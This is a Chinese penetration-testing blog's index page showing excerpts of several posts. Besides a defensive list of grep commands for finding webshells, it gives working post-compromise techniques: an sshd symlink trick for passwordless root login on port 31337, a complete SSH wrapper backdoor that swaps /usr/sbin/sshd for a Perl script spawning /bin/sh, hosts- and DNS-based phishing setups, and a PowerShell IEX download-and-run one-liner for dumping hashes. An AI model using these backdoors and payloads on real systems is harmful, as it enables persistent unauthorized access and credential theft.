Evi1cg's blog

  • 首页

  • 标签

  • 分类

  • 归档

  • 工具

  • 友链

  • 搜索

Linux查webshell

发表于 2015-09-22 | 分类于 运维

在网站目录差找如下关键字:grep -Rn "shell_exec *(" /var/wwwgrep -Rn "base64_decode *(" /var/wwwgrep -Rn "phpinfo *(" /var/wwwgrep -Rn ...

阅读全文 »

渗透过程中的SSH

发表于 2015-09-22 | 分类于 奇技淫巧

1.入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口

肉鸡上执行

1
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。

2.做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接

在肉鸡上执行:

1
2
3
4
5
6
7
[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

阅读全文 »

通过.PAC进行网络钓鱼

发表于 2015-09-21 | 分类于 奇技淫巧

0x00常见网络钓鱼方式


攻击者进行网络钓鱼的方式常有以下几种:

  • 1、通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现;
  • 2、通过修改受害者dns来实现;
  • 3、已经进入路由器,直接修改路由器的DNS。

罗列的并不全,之后遇到的话再补充,上述三种方式很常见。

1: 修改HOSTS文件,即攻击者修改受害者HOSTS文件为如下形式:

127.0.0.1 localhost
x.x.x.x www.wooyun.com

这样就受害者访问www.wooyun.com会直接访问到x.x.x.x。在msf中可以使用[inject_host](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/inject_host.rb)脚本来实现。

阅读全文 »

Powershell Gethash

发表于 2015-09-18 | 分类于 奇技淫巧

使用powershell远程调用来抓取管理hash。在线导hashpowershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent ...

阅读全文 »

域渗透中找DC

发表于 2015-09-18 | 分类于 奇技淫巧

1.net view

1
net view /domain

2.set log

1
set log

3.通过srv记录

1
nslookup -type=SRV _ldap._tcp.corp

阅读全文 »
1…192021
Evi1cg

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。
104 日志
7 分类
54 标签
RSS
GitHub Twitter 微博 E-Mail
whois api
© 2015 – 2022 Evi1cg